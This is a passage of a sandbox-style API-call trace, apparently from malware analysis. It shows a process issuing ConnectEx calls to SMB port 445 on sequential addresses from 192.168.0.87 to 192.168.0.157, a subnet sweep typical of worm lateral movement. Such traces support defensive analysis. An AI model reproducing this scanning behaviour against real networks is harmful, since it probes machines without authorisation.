(hostshort=0x1bd) returned 0xbd01 [0137.210] ConnectEx (in: s=0x424, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.87"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7790 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.210] WSAGetLastError () returned 997 [0137.210] htons (hostshort=0x1bd) returned 0xbd01 [0137.210] ConnectEx (in: s=0x428, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.88"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee77c0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.210] WSAGetLastError () returned 997 [0137.210] htons (hostshort=0x1bd) returned 0xbd01 [0137.211] ConnectEx (in: s=0x42c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.89"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee77f0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.211] WSAGetLastError () returned 997 [0137.211] htons (hostshort=0x1bd) returned 0xbd01 [0137.211] ConnectEx (in: s=0x430, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.90"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7820 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.211] WSAGetLastError () returned 997 [0137.211] htons (hostshort=0x1bd) returned 0xbd01 [0137.211] ConnectEx (in: s=0x434, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.91"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7850 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.212] WSAGetLastError () returned 997 [0137.212] htons (hostshort=0x1bd) returned 0xbd01 [0137.212] ConnectEx (in: s=0x438, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.92"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7880 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.212] WSAGetLastError () returned 997 [0137.212] htons (hostshort=0x1bd) returned 0xbd01 [0137.212] ConnectEx (in: s=0x43c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.93"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee78b0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.213] WSAGetLastError () returned 997 [0137.213] htons (hostshort=0x1bd) returned 0xbd01 [0137.213] ConnectEx (in: s=0x440, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.94"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee78e0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.213] WSAGetLastError () returned 997 [0137.213] htons (hostshort=0x1bd) returned 0xbd01 [0137.213] ConnectEx (in: s=0x444, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.95"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7910 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.213] WSAGetLastError () returned 997 [0137.213] htons (hostshort=0x1bd) returned 0xbd01 [0137.213] ConnectEx (in: s=0x448, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.96"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7940 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.214] WSAGetLastError () returned 997 [0137.214] htons (hostshort=0x1bd) returned 0xbd01 [0137.214] ConnectEx (in: s=0x44c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.97"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7970 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.214] WSAGetLastError () returned 997 [0137.214] htons (hostshort=0x1bd) returned 0xbd01 [0137.214] ConnectEx (in: s=0x450, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.98"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee79a0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.215] WSAGetLastError () returned 997 [0137.215] htons (hostshort=0x1bd) returned 0xbd01 [0137.215] ConnectEx (in: s=0x454, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.99"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee79d0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.215] WSAGetLastError () returned 997 [0137.215] htons (hostshort=0x1bd) returned 0xbd01 [0137.215] ConnectEx (in: s=0x458, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.100"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7a00 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.215] WSAGetLastError () returned 997 [0137.215] htons (hostshort=0x1bd) returned 0xbd01 [0137.215] ConnectEx (in: s=0x45c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.101"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7a30 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.216] WSAGetLastError () returned 997 [0137.216] htons (hostshort=0x1bd) returned 0xbd01 [0137.216] ConnectEx (in: s=0x460, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.102"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7a60 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.216] WSAGetLastError () returned 997 [0137.216] htons (hostshort=0x1bd) returned 0xbd01 [0137.216] ConnectEx (in: s=0x464, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.103"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7a90 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.216] WSAGetLastError () returned 997 [0137.216] htons (hostshort=0x1bd) returned 0xbd01 [0137.216] ConnectEx (in: s=0x468, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.104"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7ac0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.217] WSAGetLastError () returned 997 [0137.217] htons (hostshort=0x1bd) returned 0xbd01 [0137.217] ConnectEx (in: s=0x46c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.105"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7af0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.217] WSAGetLastError () returned 997 [0137.217] htons (hostshort=0x1bd) returned 0xbd01 [0137.217] ConnectEx (in: s=0x470, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.106"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7b20 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.217] WSAGetLastError () returned 997 [0137.217] htons (hostshort=0x1bd) returned 0xbd01 [0137.217] ConnectEx (in: s=0x474, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.107"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7b50 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.218] WSAGetLastError () returned 997 [0137.218] htons (hostshort=0x1bd) returned 0xbd01 [0137.218] ConnectEx (in: s=0x478, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.108"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7b80 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.218] WSAGetLastError () returned 997 [0137.218] htons (hostshort=0x1bd) returned 0xbd01 [0137.218] ConnectEx (in: s=0x47c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.109"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7bb0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.218] WSAGetLastError () returned 997 [0137.218] htons (hostshort=0x1bd) returned 0xbd01 [0137.218] ConnectEx (in: s=0x480, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.110"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7be0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.219] WSAGetLastError () returned 997 [0137.219] htons (hostshort=0x1bd) returned 0xbd01 [0137.219] ConnectEx (in: s=0x484, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.111"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7c10 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.219] WSAGetLastError () returned 997 [0137.219] htons (hostshort=0x1bd) returned 0xbd01 [0137.219] ConnectEx (in: s=0x488, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.112"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7c40 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.219] WSAGetLastError () returned 997 [0137.219] htons (hostshort=0x1bd) returned 0xbd01 [0137.219] ConnectEx (in: s=0x48c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.113"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7c70 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.220] WSAGetLastError () returned 997 [0137.220] htons (hostshort=0x1bd) returned 0xbd01 [0137.220] ConnectEx (in: s=0x490, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.114"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7ca0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.226] WSAGetLastError () returned 997 [0137.226] htons (hostshort=0x1bd) returned 0xbd01 [0137.227] ConnectEx (in: s=0x494, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.115"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7cd0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.227] WSAGetLastError () returned 997 [0137.227] htons (hostshort=0x1bd) returned 0xbd01 [0137.227] ConnectEx (in: s=0x498, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.116"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7d00 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.227] WSAGetLastError () returned 997 [0137.227] htons (hostshort=0x1bd) returned 0xbd01 [0137.227] ConnectEx (in: s=0x49c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.117"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7d30 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.228] WSAGetLastError () returned 997 [0137.228] htons (hostshort=0x1bd) returned 0xbd01 [0137.228] ConnectEx (in: s=0x4a0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.118"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7d60 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.228] WSAGetLastError () returned 997 [0137.228] htons (hostshort=0x1bd) returned 0xbd01 [0137.228] ConnectEx (in: s=0x4a4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.119"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7d90 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.228] WSAGetLastError () returned 997 [0137.228] htons (hostshort=0x1bd) returned 0xbd01 [0137.228] ConnectEx (in: s=0x4a8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.120"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7dc0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.229] WSAGetLastError () returned 997 [0137.229] htons (hostshort=0x1bd) returned 0xbd01 [0137.229] ConnectEx (in: s=0x4ac, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.121"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7df0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.229] WSAGetLastError () returned 997 [0137.229] htons (hostshort=0x1bd) returned 0xbd01 [0137.229] ConnectEx (in: s=0x4b0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.122"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7e20 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.229] WSAGetLastError () returned 997 [0137.229] htons (hostshort=0x1bd) returned 0xbd01 [0137.229] ConnectEx (in: s=0x4b4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.123"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7e50 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.229] WSAGetLastError () returned 997 [0137.229] htons (hostshort=0x1bd) returned 0xbd01 [0137.230] ConnectEx (in: s=0x4b8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.124"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee86a0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.230] WSAGetLastError () returned 997 [0137.230] htons (hostshort=0x1bd) returned 0xbd01 [0137.230] ConnectEx (in: s=0x4bc, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.125"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee86d0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.230] WSAGetLastError () returned 997 [0137.230] htons (hostshort=0x1bd) returned 0xbd01 [0137.230] ConnectEx (in: s=0x4c0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.126"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8700 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.230] WSAGetLastError () returned 997 [0137.230] htons (hostshort=0x1bd) returned 0xbd01 [0137.230] ConnectEx (in: s=0x4c4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.127"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8730 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.231] WSAGetLastError () returned 997 [0137.231] htons (hostshort=0x1bd) returned 0xbd01 [0137.231] ConnectEx (in: s=0x4c8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.128"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8760 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.231] WSAGetLastError () returned 997 [0137.231] htons (hostshort=0x1bd) returned 0xbd01 [0137.231] ConnectEx (in: s=0x4cc, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.129"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8790 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.231] WSAGetLastError () returned 997 [0137.231] htons (hostshort=0x1bd) returned 0xbd01 [0137.231] ConnectEx (in: s=0x4d0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.130"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee87c0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.232] WSAGetLastError () returned 997 [0137.232] htons (hostshort=0x1bd) returned 0xbd01 [0137.232] ConnectEx (in: s=0x4d4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.131"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee87f0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.232] WSAGetLastError () returned 997 [0137.232] htons (hostshort=0x1bd) returned 0xbd01 [0137.232] ConnectEx (in: s=0x4d8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.132"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8820 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.232] WSAGetLastError () returned 997 [0137.232] htons (hostshort=0x1bd) returned 0xbd01 [0137.232] ConnectEx (in: s=0x4dc, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.133"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8850 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.233] WSAGetLastError () returned 997 [0137.233] htons (hostshort=0x1bd) returned 0xbd01 [0137.233] ConnectEx (in: s=0x4e0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.134"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8880 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.233] WSAGetLastError () returned 997 [0137.233] htons (hostshort=0x1bd) returned 0xbd01 [0137.233] ConnectEx (in: s=0x4e4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.135"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee88b0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.233] WSAGetLastError () returned 997 [0137.233] htons (hostshort=0x1bd) returned 0xbd01 [0137.233] ConnectEx (in: s=0x4e8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.136"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee88e0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.234] WSAGetLastError () returned 997 [0137.234] htons (hostshort=0x1bd) returned 0xbd01 [0137.234] ConnectEx (in: s=0x4ec, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.137"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8910 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.234] WSAGetLastError () returned 997 [0137.234] htons (hostshort=0x1bd) returned 0xbd01 [0137.234] ConnectEx (in: s=0x4f0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.138"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8940 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.234] WSAGetLastError () returned 997 [0137.234] htons (hostshort=0x1bd) returned 0xbd01 [0137.234] ConnectEx (in: s=0x4f4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.139"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8970 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.235] WSAGetLastError () returned 997 [0137.235] htons (hostshort=0x1bd) returned 0xbd01 [0137.235] ConnectEx (in: s=0x4f8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.140"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee89a0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.235] WSAGetLastError () returned 997 [0137.235] htons (hostshort=0x1bd) returned 0xbd01 [0137.235] ConnectEx (in: s=0x4fc, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.141"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee89d0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.235] WSAGetLastError () returned 997 [0137.235] htons (hostshort=0x1bd) returned 0xbd01 [0137.235] ConnectEx (in: s=0x500, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.142"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8a00 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.236] WSAGetLastError () returned 997 [0137.236] htons (hostshort=0x1bd) returned 0xbd01 [0137.236] ConnectEx (in: s=0x504, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.143"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8a30 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.236] WSAGetLastError () returned 997 [0137.236] htons (hostshort=0x1bd) returned 0xbd01 [0137.236] ConnectEx (in: s=0x508, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.144"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8a60 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.236] WSAGetLastError () returned 997 [0137.236] htons (hostshort=0x1bd) returned 0xbd01 [0137.236] ConnectEx (in: s=0x50c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.145"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8a90 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.237] WSAGetLastError () returned 997 [0137.237] htons (hostshort=0x1bd) returned 0xbd01 [0137.237] ConnectEx (in: s=0x510, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.146"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8ac0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.237] WSAGetLastError () returned 997 [0137.237] htons (hostshort=0x1bd) returned 0xbd01 [0137.237] ConnectEx (in: s=0x514, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.147"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8af0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.237] WSAGetLastError () returned 997 [0137.237] htons (hostshort=0x1bd) returned 0xbd01 [0137.237] ConnectEx (in: s=0x518, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.148"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8b20 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.237] WSAGetLastError () returned 997 [0137.238] htons (hostshort=0x1bd) returned 0xbd01 [0137.238] ConnectEx (in: s=0x51c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.149"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8b50 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.238] WSAGetLastError () returned 997 [0137.238] htons (hostshort=0x1bd) returned 0xbd01 [0137.238] ConnectEx (in: s=0x520, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.150"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8b80 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.238] WSAGetLastError () returned 997 [0137.238] htons (hostshort=0x1bd) returned 0xbd01 [0137.238] ConnectEx (in: s=0x524, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.151"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8bb0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.238] WSAGetLastError () returned 997 [0137.238] htons (hostshort=0x1bd) returned 0xbd01 [0137.239] ConnectEx (in: s=0x528, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.152"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8be0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.239] WSAGetLastError () returned 997 [0137.239] htons (hostshort=0x1bd) returned 0xbd01 [0137.239] ConnectEx (in: s=0x52c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.153"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8c10 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.239] WSAGetLastError () returned 997 [0137.239] htons (hostshort=0x1bd) returned 0xbd01 [0137.239] ConnectEx (in: s=0x530, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.154"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8c40 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.239] WSAGetLastError () returned 997 [0137.239] htons (hostshort=0x1bd) returned 0xbd01 [0137.239] ConnectEx (in: s=0x534, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.155"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8c70 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.240] WSAGetLastError () returned 997 [0137.240] htons (hostshort=0x1bd) returned 0xbd01 [0137.240] ConnectEx (in: s=0x538, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.156"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8ca0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.240] WSAGetLastError () returned 997 [0137.240] htons (hostshort=0x1bd) returned 0xbd01 [0137.240] ConnectEx (in: s=0x53c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.157"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8cd0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.240] WSAGetLastError () returned 997 [0137.240] htons (hostshort=0x1bd) returned 0xbd01 [0137.240] ConnectEx (in: 